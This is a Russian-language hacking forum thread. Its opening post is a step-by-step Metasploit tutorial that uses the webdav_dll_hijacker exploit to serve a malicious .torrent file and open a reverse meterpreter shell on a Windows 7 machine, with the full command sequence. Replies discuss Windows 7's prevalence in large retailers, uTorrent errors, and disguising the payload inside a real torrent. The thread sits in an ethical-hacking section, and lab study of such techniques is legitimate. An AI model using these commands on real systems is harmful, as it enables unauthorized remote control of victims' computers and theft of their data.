1. Получи 30.000 рублей. Для получения денег необходимо принять участие в конкурсе авторов codeby. С условиями и призами можно ознакомиться на этой странице ...

    Внимание! Регистрация авторов на конкурс закрыта.

    Скрыть объявление
  2. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление

Доступ к удаленному ПК с помощью torrent-файла

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 18 апр 2017.

  1. Vander

    Vander Well-Known Member
    Администратор

    Репутация:
    7
    Регистрация:
    16 янв 2016
    Сообщения:
    896
    Симпатии:
    1.945
    Всем привет! В этой теме я хочу рассмотреть способ получения активной сессии meterpreter с помощью выполнения вредоносного кода содержащегося в файле, типа torrent.

    Доступ к удаленному ПК с помощью torrent-файла

    С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7.

    Доступ к удаленному ПК с помощью torrent-файла

    Итак, запустив Metasploit, вводим следующее:

    > use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)

    > msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)

    > set lhost 192.168.0.104 (Определим адрес атакующего хоста)

    > set extensions torrent (Выберем тип расширения файла)

    > exploit (Запустим работу фреймворка)

    Доступ к удаленному ПК с помощью torrent-файла

    Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.

    Доступ к удаленному ПК с помощью torrent-файла

    Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:

    Доступ к удаленному ПК с помощью torrent-файла

    В консоли атакующего хоста видим сигнализационные сообщения:

    Доступ к удаленному ПК с помощью torrent-файла

    Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:

    Доступ к удаленному ПК с помощью torrent-файла

    После его запуска, откроется активная сессия meterpreter:

    Доступ к удаленному ПК с помощью torrent-файла

    Проверим ее:

    Доступ к удаленному ПК с помощью torrent-файла

    В опциях эксплойта, можно изменить директорию и название полезной нагрузки:

    Доступ к удаленному ПК с помощью torrent-файла

    При попытке применить эксплоит к Windows 8.1:

    Доступ к удаленному ПК с помощью torrent-файла

    Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.

    На этом пожалуй, все, спасибо за внимание.
     
    H10, Drupa, hdmoor и 8 другим нравится это.
  2. (((_CYBORG_)))

    Репутация:
    0
    Регистрация:
    18 апр 2017
    Сообщения:
    11
    Симпатии:
    4
    Интересно , жаль только 7ки подаются так как щас везде 8-10 стоят
     
    Dat Sec нравится это.
  3. ghostphisher

    ghostphisher гарант codeby
    ELEET

    Репутация:
    4
    Регистрация:
    7 дек 2016
    Сообщения:
    1.752
    Симпатии:
    1.677
    Везде? Я бы так не утверждал. На крупных предприятиях ( компаниях ) доля 7 более 60% (к примеру стройматериалы зеленого цвета сеть магазов из франции сидят на 7, сеть продуктов с рыжим цветом - 7, красный ретейл федерал на букву М - тоже 7 ка, нии по авиа теме - 7 ка стоит), так что она есть и будет жить еще лет 5, ХР еще тркдятся кое где, причем не в пыльной бьиблиотеке Ухрюпинска.. 8-10 ка в соновном у домашних, так как львиная доля 10 пришла с покупкой нового железа.

    ТС Статья добрая, как всегда к месту. Плюсик и респект )
     
    hdmoor, Dmitry88, sergunz и 2 другим нравится это.
  4. Inject0r

    Inject0r Well-Known Member

    Репутация:
    1
    Регистрация:
    3 сен 2016
    Сообщения:
    112
    Симпатии:
    165
    было бы неплохо модифицировать реальный торрент-файл, а не пустышку создавать, не особо практично, хотя интересно
     
    Dmitry88 и Vander нравится это.
  5. (((_CYBORG_)))

    Репутация:
    0
    Регистрация:
    18 апр 2017
    Сообщения:
    11
    Симпатии:
    4
    Не ну статья то что надо! Вообще как попал сюда заметил много чего полезного ! А самое что приятное что тут автор учит пользователя! Что есть хорошо!
     
    Brib и Vander нравится это.
  6. TrevorReznik

    TrevorReznik Member

    Репутация:
    0
    Регистрация:
    27 дек 2016
    Сообщения:
    8
    Симпатии:
    12
    на предприятиях в основном 7-ки т.к. на старые принтеры и МФУ не всегда есть дрова на 10...
     
    Vander нравится это.
  7. Inject0r

    Inject0r Well-Known Member

    Репутация:
    1
    Регистрация:
    3 сен 2016
    Сообщения:
    112
    Симпатии:
    165
    у меня и на 7-ке ошибка неверной кодировки выдает utorrent
     
  8. Sokratik

    Sokratik Member

    Репутация:
    0
    Регистрация:
    13 ноя 2016
    Сообщения:
    7
    Симпатии:
    1
    Тоже попробовал на windows 7 sp1 utorrent. Та же ошибка неверной кодировки. Есть фиксы?
     
  9. Евгений967

    Евгений967 New Member

    Репутация:
    0
    Регистрация:
    30 апр 2017
    Сообщения:
    2
    Симпатии:
    0
    у меня и на 7-ке ошибка неверной кодировки выдает utorrent та же беда
     
  10. Breed

    Breed Well-Known Member

    Репутация:
    1
    Регистрация:
    18 июн 2017
    Сообщения:
    221
    Симпатии:
    234
    Если цель здешний публикаций - это увеличение числа "доморощенных кулцакеров", ищущих продукт "установил-нажал кнопку-получил результат", то можно и согласиться с такой позицией. Тогда, к примеру, и ЕГЭ - отличный способ проверки знаний!
    А вот если приучать мыслить более глобально, то автор предоставляет громадное поле деятельности и возможность пошевелить серым веществом, а заодно - возможность проявить инициативу. Дано направление куда копать, а реализацию можно сочинять самому.
    =================
    Я здесь вообще-то недавно и, памятуя о том, что со своим уставом в чужой монастырь не ходят, особо не выпячиваюсь. Но полагаю, что все непонятки при собственной реализации принципа внедрения-атаки можно решить либо обращением в общедоступной ветке (то бишь здесь), либо в личке к автору, если придумали нечто реально стоящее.
    Нужно приучать людей ДУМАТЬ. Или я неправ?
     
    MrBa, H10, a113 и ещё 1-му нравится это.
Загрузка...
Похожие Темы - Доступ удаленному ПК
  1. Vander
    Ответов:
    44
    Просмотров:
    3.447
  2. Vander
    Ответов:
    39
    Просмотров:
    5.703
  3. PingVinich
    Ответов:
    3
    Просмотров:
    111
  4. Vander
    Ответов:
    7
    Просмотров:
    123
  5. animi
    Ответов:
    0
    Просмотров:
    125

Поделиться этой страницей